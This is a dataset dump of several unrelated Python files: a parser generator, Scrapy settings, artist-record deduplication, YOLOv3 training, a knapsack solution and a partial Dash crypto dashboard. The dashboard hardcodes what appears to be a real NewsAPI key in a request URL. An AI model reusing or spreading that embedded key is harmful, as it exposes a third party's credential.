prod_rule[1]\r\n# file.write(' print(\"' + prod_rule[0] + ' called\")\\n')\r\n file.write(' if not(self.skipErrors(\"' + prod_rule[0] + '\")): return False\\n')\r\n\r\n isEpsilonIn = ['EPSILON'] in prods\r\n first_prod = prods.pop(0)\r\n file.write(' if self.checkFirst(' + str(first_prod) +'):\\n')\r\n file.write(' if (')\r\n for index, element in enumerate(first_prod):\r\n if index < len(first_prod) - 1:\r\n if not(element in TERMINAL_LIST):\r\n file.write('self.' + element + '() and ')\r\n else:\r\n file.write('self.match(\"' + element + '\") and ')\r\n else:\r\n if not(element in TERMINAL_LIST):\r\n file.write('self.' + element + '()')\r\n else:\r\n file.write('self.match(\"' + element + '\")')\r\n file.write('):\\n')\r\n file.write(' self._productions.append(\"' + prod_rule[0] +' -> ' + ' '.join(first_prod) + '\")\\n')\r\n# file.write(' print(\"' + prod_rule[0] +' -> ' + ' '.join(first_prod) + '\")\\n')\r\n file.write(' return True\\n')\r\n file.write(' else:\\n')\r\n file.write(' return False\\n')\r\n\r\n if len(prods) > 0:\r\n for prod in prods:\r\n if prod != ['EPSILON']:\r\n file.write(' elif self.checkFirst(' + str(prod) +'):\\n')\r\n file.write(' if (')\r\n for index, element in enumerate(prod):\r\n if index < len(prod) - 1:\r\n if not(element in TERMINAL_LIST):\r\n file.write('self.' + element + '() and ')\r\n else:\r\n file.write('self.match(\"' + element + '\") and ')\r\n else:\r\n if not(element in TERMINAL_LIST):\r\n file.write('self.' + element + '()')\r\n else:\r\n file.write('self.match(\"' + element + '\")')\r\n file.write('):\\n')\r\n file.write(' self._productions.append(\"' + prod_rule[0] +' -> ' + ' '.join(prod) + '\")\\n')\r\n# file.write(' print(\"' + prod_rule[0] +' -> ' + ' '.join(prod) + '\")\\n')\r\n file.write(' return True\\n')\r\n file.write(' else:\\n')\r\n file.write(' return False\\n')\r\n\r\n if isEpsilonIn:\r\n file.write(' elif self.checkFollow([\"' + prod_rule[0] +'\"]):\\n')\r\n file.write(' self._productions.append(\"' + prod_rule[0] +' -> EPSILON\")\\n')\r\n# file.write(' print(\"' + prod_rule[0] +' -> EPSILON\")\\n')\r\n file.write(' return True\\n')\r\n\r\n file.write(' else:\\n')\r\n file.write(' return False\\n')\r\n\r\n file.close()\r\n\r\ndef createSynthiaMain():\r\n with open(GEN_PATH + 'synthia_main.py', 'r') as f:\r\n file = open(SYNTHIA_PATH + 'synthia.py', 'a')\r\n file.write(f.read())\r\n file.close()\r\n\r\nif __name__ == \"__main__\":\r\n createSynthia()\r\n","sub_path":"src/syntactic_analyzer/gen/gen.py","file_name":"gen.py","file_ext":"py","file_size_in_byte":4548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"338373490","text":"__author__ = 'Dazdingo'\n\nBOT_NAME = 'orcinus_price spiders'\n\nSPIDER_MODULES = ['crawl.spiders']\nNEWSPIDER_MODULE = 'crwal.spiders'\nITEM_PIPELINES = {\n 'crawl.pipelines.BookPipeline': 300,\n 'crawl.pipelines.DetailPipeline': 800,\n}\n# Crawl responsibly by identifying yourself (and your website) on the user-agent\nUSER_AGENT = 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.66 Safari/537.36'\n#LOG_FILE = 'C:/Users/Administrator/Source/Repos/orcinus_price/crawl/error.txt'\nLOG_FILE = 'log/error.txt'\nLOG_ENABLED = False","sub_path":"crawl/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"585067788","text":"import re\nfrom typing import Any\n\nfrom tidysic.tag import Tag\n\n\nclass FormattedString:\n '''\n A formatted string contains tag keys written in double\n curly brackets, such as `{{artist}}`.\n\n The double brackets are useful if you want to insert text\n that will only be displayed if the tag is not None. For\n instance, the string\n\n `{{track}. }{{title}}`\n\n will become\n\n `1. Intro`\n\n if the `track` tag is defined. Otherwise, it will just\n be\n\n `Intro`\n\n The `year` and `track` tags can be formatted as usual, seeing\n as they are integer values. This way, track numbers may be\n padded using:\n\n `{{track:02d}. }{{title}}`\n '''\n\n def __init__(self, string: str):\n try:\n FormattedString.assert_well_written(string)\n except AssertionError as e:\n raise ValueError(\n f'Could not create FormattedString from {string}: {e}'\n )\n\n self._str = string\n\n def build(self, tags: dict[Tag, Any]) -> str:\n pattern = r'\\{(.*?\\{(\\w+)(:.+?)?\\}.*?)\\}'\n matches = re.findall(pattern, self._str)\n\n return_string = self._str\n\n substitutions = []\n for to_substitute, tag_name, format_spec in matches:\n\n value = None\n tag = Tag[tag_name.capitalize()]\n\n value = tags[tag]\n if tag in {Tag.Year, Tag.Track} and value:\n value = int(value)\n if tag in {Tag.Title, Tag.Artist, Tag.Album} and not value:\n value = f'Unknown {tag.name}'\n\n formattable = to_substitute.replace(\n f'{{{tag_name}{format_spec}}}',\n f'{{{format_spec}}}'\n )\n substitutions.append((\n f'{{{to_substitute}}}',\n formattable.format(value) if value else ''\n ))\n\n for old, new in substitutions:\n return_string = return_string.replace(old, new)\n\n return return_string\n\n @staticmethod\n def assert_well_written(string: str):\n '''\n Runs a series of assert statements that will pass only if the provided\n string has a correct format. Refer to the class' documentation for more\n info on the format.\n\n Args:\n string (str): String whose format to test.\n '''\n bracket_depth = 0\n current_tag_name = ''\n\n for i, char in enumerate(string):\n if char == '{':\n bracket_depth += 1\n assert bracket_depth <= 2, (\n f'Too many opening brackets (col {i})'\n )\n\n elif char == '}':\n bracket_depth -= 1\n assert bracket_depth >= 0, (\n f'Too many closing brackets (col {i})'\n )\n\n if bracket_depth == 0:\n assert current_tag_name in {\n tag.name.lower()\n for tag in Tag\n }, (\n f'Invalid tag name {current_tag_name}'\n )\n current_tag_name = ''\n\n elif bracket_depth == 2:\n current_tag_name += char\n","sub_path":"tidysic/formatted_string.py","file_name":"formatted_string.py","file_ext":"py","file_size_in_byte":3185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"55732878","text":"from os.path import join, realpath, dirname\nimport os\nfrom difflib import SequenceMatcher\nfrom multiprocessing import Pool\nimport re\nfrom collections import Counter\nimport pandas as pd\n\nfrom models import SourceArtist, CleanedArtist, sqlite_db, data_path\n\n\nmy_data = None\n\n### Part 1\n# a) TODO (complete in models.py)\n\n# b) TODO\nif __name__ == '__main__':\n\tartist_csv = join(dirname(realpath(__file__)), 'data/sothebys_artists.csv')\n\tsqlite_db.init(data_path)\n\tif sqlite_db.connect():\n\t\tprint(\"Connected to database\")\n\n\tsqlite_db.drop_tables([SourceArtist, CleanedArtist])\n\tsqlite_db.create_tables([SourceArtist, CleanedArtist])\n\tprint(\"Database Initialized\")\n\n# c) TODO\n\t#Read data from csv to panda\n\tdata = pd.read_csv(artist_csv)\n\n\t#rename fields of csv\n\tdata = data.rename(index=str, columns={\"name\": \"artist\", \"birth_year\": \"birth\", \"death_year\": \"death\"})\n\tdataDict = data.to_dict('records')\n\n\t#Insert data to database\n\tstep = 150\n\tfor i in range(0, len(dataDict), step):\n\t\tquery = SourceArtist.insert_many(dataDict[i:i+step])\n\t\tquery.execute()\n\n## Part 2\n# a)\n\t#Put data in a dataframe\n\tquery = SourceArtist.select(SourceArtist.artist, SourceArtist.birth, SourceArtist.death)\n\tmy_data = pd.DataFrame(list(query.dicts()))\n\tprint(len(my_data), \"records read from database\")\n\n# b,c)\ndef Data_Extractor(data):\n\t#Regex that breaks sentence where there is no letter\n\tregex_for_name = r\"(\\w+?)\\W\"\n\t#Regex that finds all 4-digit numbers\n\tregex_for_no = r\"([0-9][0-9][0-9][0-9])\"\n\n\tfor index, row in data.iterrows():\n\t\tif index%1000 == 0:\n\t\t\tprint(\"Process\", os.getpid(), \":\", index)\n\n\t\tmatches = re.findall(regex_for_no, row['artist'])\n\t\t#If only one 4 digit put in birth\n\t\tif len(matches) == 1:\n\t\t\tdata.loc[index, \"birth\"] = matches[0]\n\t\telif len(matches) >= 2:\n\t\t\t#Put the two dates into \"birth\" and \"death\"\n\t\t\tif matches[0] < matches[1]:\n\t\t\t\tdata.loc[index, \"birth\"] = matches[0]\n\t\t\t\tdata.loc[index, \"death\"] = matches[1]\n\t\t\telse:\n\t\t\t\tdata.loc[index, \"birth\"] = matches[1]\n\t\t\t\tdata.loc[index, \"death\"] = matches[0]\n\t\t#How to find artist name\n\t\tartist = re.findall(regex_for_name, row['artist'] + ' ')\n\t\tline = ''\n\t\ti = 0\n\t\t#Put in string until digit found(usually the dates)\n\t\twhile i < len(artist) and not artist[i].isdigit():\n\t\t\tif artist[i] not in [\"br\", \"nbsp\", \"b\", \"d\", \"dit\"]:\n\t\t\t\tline = line + artist[i] + \" \"\n\t\t\ti = i + 1\n\t\tif 'by' in line:\n\t\t\tline = line.split('by')[1]\n\t\tdata.loc[index, \"artist\"] = line.strip()\n\treturn data\n\n# Split data into parts\ndef data_splitter(number_of_parts, data):\n\tpart_Size = int(len(data)/number_of_parts)\n\tdata_parts = []\n\tfor i in range(0, number_of_parts-1):\n\t\tdata_parts.append(data.iloc[part_Size*i :part_Size*(i+1), : ])\n\tdata_parts.append(data.iloc[part_Size*(number_of_parts-1):, : ])\n\treturn data_parts\n\n#Run multiple processes\nif __name__ == '__main__':\n\tnumber_of_processes = 8\n\tpool = Pool(number_of_processes)\n\tprint('Cleaning data based on regex parsing...')\n\tmy_data = pd.concat(pool.map(Data_Extractor, data_splitter(number_of_processes, my_data)))\n\tpool.close()\n\tprint('Cleaning done.')\n\tprint('')\n\n# d,e)\n\n#Deduplication based on string similarity\ndef deduplicate(original_row, data_to_check):\n\t#remove first elements from original_row to avoid duplicates during result merging\n\tif len(original_row['birth']) > 0:\n\t\tdel original_row['birth'][0]\n\tif len(original_row['death']) > 0:\n\t\tdel original_row['death'][0]\n\tname_to_check = original_row['name'].pop(0)\n\toriginal_row['count'] -= 1\n\tfor index in range(0, len(data_to_check)):\n\t\tif index < len(data_to_check):\n\t\t\trow = data_to_check.iloc[index]\n\t\t\tratio = SequenceMatcher(None, name_to_check.lower(), row['artist'].lower()).ratio()\n\t\t\tif ratio > 0.8:\n\t\t\t\toriginal_row['name'].append(row['artist'])\n\t\t\t\toriginal_row['birth'].append(row['birth'])\n\t\t\t\toriginal_row['death'].append(row['death'])\n\t\t\t\toriginal_row['count'] += 1\n\t\t\t\tdata_to_check.drop(inplace=True, index=data_to_check.index[index])\n\t\t\t\tdata_to_check.reset_index(inplace=True, drop=True)\n\t\t\t\tindex -= 1\n\t\tindex += 1\n\t#Return both the original_row containing the metrics and the data_to_check containing the deduplicated dataset\n\treturn (original_row, data_to_check)\n\nif __name__ == '__main__':\n\tindex = 0\n\twhile index < len(my_data):\n\t\t#Get the current row from the data\n\t\trow_outter = my_data.iloc[index]\n\n\t\t#Skip names containing numerals (for names containing century)\n\t\tif any(char.isdigit() for char in row_outter['artist']):\n\t\t\tprint(\"Record with artist name\", row_outter['artist'], \"skipped.\")\n\t\t\tmy_data.drop(inplace=True, index=my_data.index[index])\n\t\t\tcontinue\n\n\t\t#Initialize values\n\t\tname = [row_outter['artist']]\n\t\tbirth = []\n\t\tdeath = []\n\t\tcount = 1\n\n\t\t#Check birth and death in order to ensure they are numerals\n\t\tif row_outter['birth'] is not None and isinstance(row_outter['birth'], float):\n\t\t\tbirth.append(row_outter['birth'])\n\t\tif row_outter['death'] is not None and isinstance(row_outter['death'], float):\n\t\t\tdeath.append(row_outter['death'])\n\n\t\t#Print the name being checked and the remaining size of the data\n\t\tprint(\"Artist\", name[0], \"deduplicatation started with\", len(my_data), \"records still remaining in database\")\n\n\t\t#Split the remaining data into parts and run a multithreaded similarity based search on them\n\t\tif __name__ == '__main__':\n\t\t\tsearch_pool = Pool(int(number_of_processes))\n\t\t\targs = []\n\t\t\tparts = data_splitter(int(number_of_processes), my_data.iloc[index+1:, :])\n\t\t\tfor part in parts:\n\t\t\t\targs.append(({'name':name, 'birth':birth, 'death':death, 'count':count}, part))\n\t\t\tsearch_results = search_pool.starmap(deduplicate, args)\n\t\t\tsearch_pool.close()\n\n\t\t#Merge results\n\t\tdata_parts = []\n\t\tfor res in search_results:\n\t\t\t#res[0] is the data exctracted and res[1] is the deduplicated dataset for each partition\n\t\t\tname = name + res[0]['name']\n\t\t\tbirth = birth + res[0]['birth']\n\t\t\tdeath = death + res[0]['death']\n\t\t\tcount += res[0]['count']\n\t\t\tdata_parts.append(res[1])\n\t\tmy_data = pd.concat(data_parts)\n\t\tmy_data.reset_index(inplace=True, drop=True)\n\t\tname = Counter(name).most_common(1)[0][0]\n\t\n\t\t#Clear the nan values from birth and death arrays\n\t\tbirth = [x for x in birth if str(x) != 'nan']\n\t\tdeath = [x for x in death if str(x) != 'nan']\n\t\tif len(birth) > 0:\n\t\t\tbirth = Counter(birth).most_common(1)[0][0]\n\t\telse:\n\t\t\tbirth = None\n\t\tif len(death) > 0:\n\t\t\tdeath = Counter(death).most_common(1)[0][0]\n\t\telse:\n\t\t\tdeath = None\n\t\n\t\t#Print results for the current artist\n\t\tprint(\"Deduplication resuls:\")\n\t\tprint(\"Name:\", name)\n\t\tprint(\"Birth:\", birth)\n\t\tprint(\"Death:\", death)\n\t\tprint(\"Count:\", count)\n\n\t\t#Insert into database the deduplicated entry\n\t\tres = CleanedArtist.insert({'artist':name, 'birth': birth, 'death': death, 'count': count}).execute()\n\t\tif res is not None and res > 0:\n\t\t\tprint(\"Record for\", name, \"inserted to CleanedArtist\")\n\t\tprint('')\n\t\t#index does not need to be incremented because we delete the current row in line 158, so we will just look at row 0 untill all rows are deleted\n\t\t#index += 1\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"334360576","text":"from absl import app, flags, logging\nfrom absl.flags import FLAGS\nimport tensorflow as tf\nimport numpy as np\nimport os, shutil\nfrom tensorflow.keras.callbacks import (\n ReduceLROnPlateau,\n EarlyStopping,\n ModelCheckpoint,\n TensorBoard\n)\nfrom yolov3_tf2.models import (\n YoloV3, YoloV3Tiny, YoloLoss,\n yolo_anchors, yolo_anchor_masks,\n yolo_tiny_anchors, yolo_tiny_anchor_masks\n)\nfrom yolov3_tf2.utils import freeze_all\nimport yolov3_tf2.dataset as dataset\n\nflags.DEFINE_string('dataset', '', 'path to dataset')\nflags.DEFINE_boolean('tiny', False, 'yolov3 or yolov3-tiny')\nflags.DEFINE_string('weights', './checkpoints/yolov3.tf',\n 'path to weights file')\nflags.DEFINE_string('classes', './data/coco.names', 'path to classes file')\nflags.DEFINE_string('name', '', 'output file name to save')\nflags.DEFINE_string('gpu', '', 'name of gpu to use')\nflags.DEFINE_enum('mode', 'fit', ['fit', 'eager_fit', 'eager_tf'],\n 'fit: model.fit, '\n 'eager_fit: model.fit(run_eagerly=True), '\n 'eager_tf: custom GradientTape')\nflags.DEFINE_enum('transfer', 'none',\n ['none', 'darknet', 'no_output', 'frozen', 'fine_tune'],\n 'none: Training from scratch, '\n 'darknet: Transfer darknet, '\n 'no_output: Transfer all but output, '\n 'frozen: Transfer and freeze all, '\n 'fine_tune: Transfer all and freeze darknet only')\nflags.DEFINE_integer('size', 416, 'image size')\nflags.DEFINE_integer('epochs', 2, 'number of epochs')\nflags.DEFINE_integer('batch_size', 8, 'batch size')\nflags.DEFINE_float('learning_rate', 1e-3, 'learning rate')\nflags.DEFINE_integer('num_classes', 80, 'number of classes in the model')\n\n\ndef get_free_gpu():\n \"\"\"Selects the gpu with the most free memory\n \"\"\"\n import subprocess\n import numpy as np\n\n output = subprocess.Popen('nvidia-smi -q -d Memory |grep -A4 GPU|grep Free', stdout=subprocess.PIPE,\n shell=True).communicate()[0]\n output = output.decode(\"ascii\")\n # assumes that it is on the popiah server and the last gpu is not used\n memory_available = [int(x.split()[2]) for x in output.split(\"\\n\")[:-2]]\n if not memory_available:\n return\n print(\"Setting GPU to use to PID {}\".format(np.argmax(memory_available)))\n return np.argmax(memory_available)\n\n\ndef set_one_gpu():\n\n gpu = FLAGS.gpu\n if not gpu:\n gpu = str(get_free_gpu())\n\n if not gpu:\n return\n\n print(\"Using GPU: %s\" % gpu)\n os.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\" # see issue #152\n os.environ['CUDA_VISIBLE_DEVICES'] = gpu\n\n\ndef main(_argv):\n set_one_gpu()\n\n if FLAGS.tiny:\n model = YoloV3Tiny(FLAGS.size, training=True,\n classes=FLAGS.num_classes)\n anchors = yolo_tiny_anchors\n anchor_masks = yolo_tiny_anchor_masks\n else:\n model = YoloV3(FLAGS.size, training=True, classes=FLAGS.num_classes)\n anchors = yolo_anchors\n anchor_masks = yolo_anchor_masks\n\n # train_dataset = dataset.load_fake_dataset()\n dataset_name = 'data/' + FLAGS.dataset + '.train.record'\n val_dataset_name = 'data/' + FLAGS.dataset + '.val.record'\n\n train_dataset = dataset.load_tfrecord_dataset(\n dataset_name, FLAGS.classes)\n train_dataset = train_dataset.shuffle(buffer_size=1024) # TODO: not 1024\n train_dataset = train_dataset.batch(FLAGS.batch_size)\n train_dataset = train_dataset.map(lambda x, y: (\n dataset.transform_images(x, FLAGS.size),\n dataset.transform_targets(y, anchors, anchor_masks, 80)))\n train_dataset = train_dataset.prefetch(\n buffer_size=tf.data.experimental.AUTOTUNE)\n\n tf_name = FLAGS.name\n if not tf_name:\n tf_name = 'train' + FLAGS.gpu\n best_tf_name = \"checkpoints/%s_best.tf\" % tf_name\n last_tf_name = \"checkpoints/%s_last.tf\" % tf_name\n\n # val_dataset = dataset.load_fake_dataset()\n val_dataset = dataset.load_tfrecord_dataset(\n val_dataset_name, FLAGS.classes)\n val_dataset = val_dataset.batch(FLAGS.batch_size)\n val_dataset = val_dataset.map(lambda x, y: (\n dataset.transform_images(x, FLAGS.size),\n dataset.transform_targets(y, anchors, anchor_masks, 80)))\n\n if FLAGS.transfer != 'none':\n model.load_weights(FLAGS.weights)\n if FLAGS.transfer == 'fine_tune':\n # freeze darknet\n darknet = model.get_layer('yolo_darknet')\n freeze_all(darknet)\n elif FLAGS.transfer == 'frozen':\n # freeze everything\n freeze_all(model)\n else:\n # reset top layers\n if FLAGS.tiny: # get initial weights\n init_model = YoloV3Tiny(\n FLAGS.size, training=True, classes=FLAGS.num_classes)\n else:\n init_model = YoloV3(\n FLAGS.size, training=True, classes=FLAGS.num_classes)\n\n if FLAGS.transfer == 'darknet':\n for l in model.layers:\n if l.name != 'yolo_darknet' and l.name.startswith('yolo_'):\n l.set_weights(init_model.get_layer(\n l.name).get_weights())\n else:\n freeze_all(l)\n elif FLAGS.transfer == 'no_output':\n for l in model.layers:\n if l.name.startswith('yolo_output'):\n l.set_weights(init_model.get_layer(\n l.name).get_weights())\n else:\n freeze_all(l)\n\n optimizer = tf.keras.optimizers.Adam(lr=FLAGS.learning_rate)\n loss = [YoloLoss(anchors[mask], classes=FLAGS.num_classes)\n for mask in anchor_masks]\n best_val_loss = 0\n history = None\n\n if FLAGS.mode == 'eager_tf':\n # Eager mode is great for debugging\n # Non eager graph mode is recommended for real training\n avg_loss = tf.keras.metrics.Mean('loss', dtype=tf.float32)\n avg_val_loss = tf.keras.metrics.Mean('val_loss', dtype=tf.float32)\n\n for epoch in range(1, FLAGS.epochs + 1):\n for batch, (images, labels) in enumerate(train_dataset):\n with tf.GradientTape() as tape:\n outputs = model(images, training=True)\n regularization_loss = tf.reduce_sum(model.losses)\n pred_loss = []\n for output, label, loss_fn in zip(outputs, labels, loss):\n pred_loss.append(loss_fn(label, output))\n total_loss = tf.reduce_sum(pred_loss) + regularization_loss\n\n grads = tape.gradient(total_loss, model.trainable_variables)\n optimizer.apply_gradients(\n zip(grads, model.trainable_variables))\n\n # logging.info(\"{}_train_{}, {}, {}\".format(\n # epoch, batch, total_loss.numpy(),\n # list(map(lambda x: np.sum(x.numpy()), pred_loss))))\n avg_loss.update_state(total_loss)\n\n for batch, (images, labels) in enumerate(val_dataset):\n outputs = model(images)\n regularization_loss = tf.reduce_sum(model.losses)\n pred_loss = []\n for output, label, loss_fn in zip(outputs, labels, loss):\n pred_loss.append(loss_fn(label, output))\n total_loss = tf.reduce_sum(pred_loss) + regularization_loss\n\n # logging.info(\"{}_val_{}, {}, {}\".format(\n # epoch, batch, total_loss.numpy(),\n # list(map(lambda x: np.sum(x.numpy()), pred_loss))))\n avg_val_loss.update_state(total_loss)\n\n val_lost = avg_val_loss.result().numpy()\n logging.info(\"{}, train: {}, val: {}\".format(\n epoch,\n avg_loss.result().numpy(),\n val_lost))\n\n avg_loss.reset_states()\n avg_val_loss.reset_states()\n model.save_weights(last_tf_name)\n if best_val_loss == 0 or best_val_loss > val_lost:\n best_val_loss = val_lost\n logging.info(\"saving best val loss: %s\" % best_tf_name)\n model.save_weights(best_tf_name)\n else:\n model.compile(optimizer=optimizer, loss=loss,\n run_eagerly=(FLAGS.mode == 'eager_fit'))\n\n callbacks = [\n ReduceLROnPlateau(verbose=1),\n EarlyStopping(patience=3, verbose=1),\n ModelCheckpoint(best_tf_name,\n verbose=1, save_weights_only=True),\n TensorBoard(log_dir='logs')\n ]\n\n history = model.fit(train_dataset,\n epochs=FLAGS.epochs,\n callbacks=callbacks,\n validation_data=val_dataset)\n\n if history is not None:\n print(history.history['val_loss'])\n best_val_loss = min(history.history['val_loss'])\n model.save_weights(best_tf_name)\n\n print(\"Best weights are saved as %s\" % best_tf_name)\n tiny = 'tiny_' if FLAGS.tiny else ''\n out_name = \"%s_d%s_%sm%s_bs%d_s%s_e%d_val%d\" % \\\n (tf_name, FLAGS.dataset, tiny, FLAGS.transfer, FLAGS.batch_size, FLAGS.size, FLAGS.epochs, best_val_loss)\n mfn = \"data/model/%s/\" % out_name\n\n final_tf_name = \"%s.tf\" % out_name\n copy_tf(\"%s_best.tf\" % tf_name, final_tf_name)\n print(\"Final checkpoint file saved as: %s\" % final_tf_name)\n model.load_weights(best_tf_name)\n tf.saved_model.save(model, mfn)\n print(\"Model file saved to: %s\" % mfn)\n\n\ndef copy_tf(ifn, ofn):\n for fn in os.listdir('checkpoints'):\n if not fn.startswith(ifn):\n continue\n out = fn.replace(ifn, ofn)\n shutil.copyfile('checkpoints/' + fn, 'checkpoints/' + out)\n\nif __name__ == '__main__':\n try:\n app.run(main)\n except SystemExit:\n pass\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":9984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"61326514","text":"''' Problem Statement-: You have M questions and N seconds to complete a test.\n Each question has some points and takes some time to solve (which will be given as input).\n Find the maximum mark that can be scored by the student within the given time N.\n\nSample test case:\n\n4 // number of questions\n10 // Total time to attend the test\n1 2 // one mark question – 2 seconds to solve.\n2 3 // two mark question – 3 seconds to solve.\n3 5 // three mark question – 5 seconds to solve.\n4 7 // 4 mark question – 7 seconds to solve.\n'''\nt=[[-1 for j in range(1001)] for i in range(1001)]\ndef maxMarks(val,wt,n,w):\n if n==0 or w==0:\n return 0\n if t[n][w]!=-1:\n return t[n][w]\n if wt[n-1]<=w:\n t[n][w]= max(val[n-1]+maxMarks(val,wt,n-1,w-wt[n-1]), maxMarks(val,wt,n-1,w))\n return t[n][w]\n else:\n t[n][w]= maxMarks(val,wt,n-1,w)\n return t[n][w]\n\n\n\n\nval=[1,2,3,4]\nwt= [2,3,5,7]\nw=10\nn=len(wt)\n\nprint(maxMarks(val,wt,n,w))\n\n","sub_path":"Dynamic Programming/TCS_Digital_questions.py","file_name":"TCS_Digital_questions.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"427555842","text":"import os\nimport pathlib\nimport json\nimport base64\nimport datetime\nimport requests\nimport pathlib\nimport math\nimport pandas as pd\nimport flask\n\nimport plotly.graph_objs as go\nfrom plotly import tools\n\nimport dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output, State\nimport dash_table\nimport dash_daq as daq\nimport ccxt\nimport crypto_stream\nfrom dash.exceptions import PreventUpdate\nimport models\nimport time\nimport backtesting\nimport dash_table.FormatTemplate as FormatTemplate\ncrypto_stream.init_connection()\n\nserver = flask.Flask(__name__)\n\napp = dash.Dash(\n __name__,\n server=server,\n meta_tags=[{\"name\": \"viewport\", \"content\": \"width=device-width, initial-scale=1\"}],\n)\n\napp.config[\"suppress_callback_exceptions\"] = True\n\nAPP_PATH = str(pathlib.Path(__file__).parent.resolve())\nSTREAM_TABLE = dict(id='stream-table',data=[{'close':0.0, \n \"balance\": 10000, \n \"shares\": 0, \n 'status':''}\n ],\n columns=[{'id':'close', 'name':'Close'},\n {'id':'balance', 'name':'Balance'},\n {'id':'shares', 'name':'Shares'},\n {'id':'status', 'name':'Status'}])\ncolumns=[\n 'Stock', \n 'Entry Date', \n 'Exit Date', \n 'Shares', \n 'Entry Share Price', \n 'Exit Share Price', \n 'Entry Portfolio Holding', \n 'Exit Portfolio Holding', \n 'Profit/Loss']\n#dict(id='trade-metric-table',data=[],columns=[{'id':col, 'name':col} for col in columns])\nTRADE_METRIC_TABLE = dict(id='trade-metric-table', data=[], \n columns=[{'id':'Stock', 'name':'Stock'},\n {'id':'Entry Date', 'name':'Entry Date', 'type': 'datetime'},\n {'id':'Exit Date', 'name':'Exit Date', 'type': 'datetime'},\n {'id':'Shares', 'name':'Shares'},\n {'id':'Entry Share Price', 'name':'Entry Share Price', 'type':'numeric','format': FormatTemplate.money(2)},\n {'id':'Exit Share Price', 'name':'Exit Share Price','type':'numeric','format': FormatTemplate.money(2)},\n {'id':'Entry Portfolio Holding', 'name':'Entry Portfolio Holding', 'type':'numeric','format': FormatTemplate.money(2)},\n {'id':'Exit Portfolio Holding', 'name':'Exit Portfolio Holding', 'type':'numeric','format': FormatTemplate.money(2)},\n {'id':'Profit/Loss', 'name':'Profit/Loss', 'type':'numeric','format': FormatTemplate.money(2)}])\n\n\n# API Requests for news div\nnews_requests = requests.get(\n \"https://newsapi.org/v2/top-headlines?sources=bbc-news&apiKey=da8e2e705b914f9f86ed2e9692e66012\"\n)\n\n# API Call to update news\ndef update_news():\n json_data = news_requests.json()[\"articles\"]\n df = pd.DataFrame(json_data)\n df = pd.DataFrame(df[[\"title\", \"url\"]])\n max_rows = 10\n return html.Div(\n children=[\n html.P(className=\"p-news\", children=\"Headlines\"),\n html.P(\n className=\"p-news float-right\",\n children=\"Last update : \"\n + datetime.datetime.now().strftime(\"%H:%M:%S\"),\n ),\n html.Table(\n className=\"table-news\",\n children=[\n html.Tr(\n children=[\n html.Td(\n children=[\n html.A(\n className=\"td-link\",\n children=df.iloc[i][\"title\"],\n href=df.iloc[i][\"url\"],\n target=\"_blank\",\n )\n ]\n )\n ]\n )\n for i in range(min(len(df), max_rows))\n ],\n ),\n ]\n )\n\n# MAIN CHART TRACES (STYLE tab)\ndef line_trace(df, y_col, color='rgb(244, 212, 77)'):\n trace = go.Scatter(\n x=df.index, \n y=df[y_col], \n mode=\"lines\", \n showlegend=False, \n name=y_col,\n line=dict(color=color)\n )\n return trace\n\ndef marker_trace(x_data, y_data, symbol, color, name, marker_size=15):\n trace = go.Scatter(\n x=x_data, \n y=y_data, \n mode=\"markers\", \n showlegend=False, \n marker_size=marker_size,\n marker_symbol=symbol,\n marker_color=color,\n name=name\n )\n return trace\n\ndef bar_trace(df, y_col):\n return go.Ohlc(\n x=df.index,\n open=df[y_col],\n increasing=dict(line=dict(color=\"#888888\")),\n decreasing=dict(line=dict(color=\"#888888\")),\n showlegend=False,\n name=\"bar\",\n )\ndef colored_bar_trace(df):\n return go.Ohlc(\n x=df.index,\n open=df[\"open\"],\n high=df[\"high\"],\n low=df[\"low\"],\n close=df[\"close\"],\n showlegend=False,\n name=\"colored bar\",\n )\n\ndef candlestick_trace(df, col):\n return go.Candlestick(\n x=df.index,\n open=df[\"open\"],\n high=df[\"high\"],\n low=df[\"low\"],\n close=df[\"close\"],\n increasing=dict(line=dict(color=\"#00ff00\")),\n decreasing=dict(line=dict(color=\"white\")),\n showlegend=False,\n name=\"candlestick\",\n )\n\ndef get_fig_layout(tickformat=\"%H:%M:%S\"):\n layout = dict(margin=dict(t=40),\n hovermode=\"closest\",\n #uirevision=True,\n height=350,\n paper_bgcolor=\"rgba(0,0,0,0)\",\n plot_bgcolor=\"rgba(0,0,0,0)\",\n legend={\"font\": {\"color\": \"darkgray\"}, \"orientation\": \"h\", \"x\": 0, \"y\": 1.1},\n font={\"color\": \"darkgray\"},\n showlegend=True,\n xaxis={\n \"zeroline\": False,\n \"showgrid\": False,\n \"title\": \"Closing Price\",\n \"showline\": False,\n #\"domain\": [0, 0.8],\n \"tickformat\" : tickformat,\n \"titlefont\": {\"color\": \"darkgray\"},\n },\n yaxis={\n \"title\": 'Time',\n \"showgrid\": False,\n \"showline\": False,\n \"zeroline\": False,\n \"autorange\": True,\n \"titlefont\": {\"color\": \"darkgray\"},\n },xaxis2={\n \"title\": \"Time\",\n #\"domain\": [0.8, 1], # 70 to 100 % of width\n \"titlefont\": {\"color\": \"darkgray\"},\n \"showgrid\": False,\n },\n yaxis2={\n \"anchor\": \"free\",\n \"overlaying\": \"y\",\n \"side\": \"right\",\n \"showticklabels\": False,\n \"titlefont\": {\"color\": \"darkgray\"},\n },\n )\n return layout\n \ndef generate_section_banner(title):\n return html.Div(className=\"section-banner\", children=title)\n\ndef get_close_fig(df):\n # Add main trace (style) to figure\n '''fig = make_subplots(\n rows=1,\n shared_xaxes=True,\n shared_yaxes=True,\n cols=1,\n print_grid=False,\n 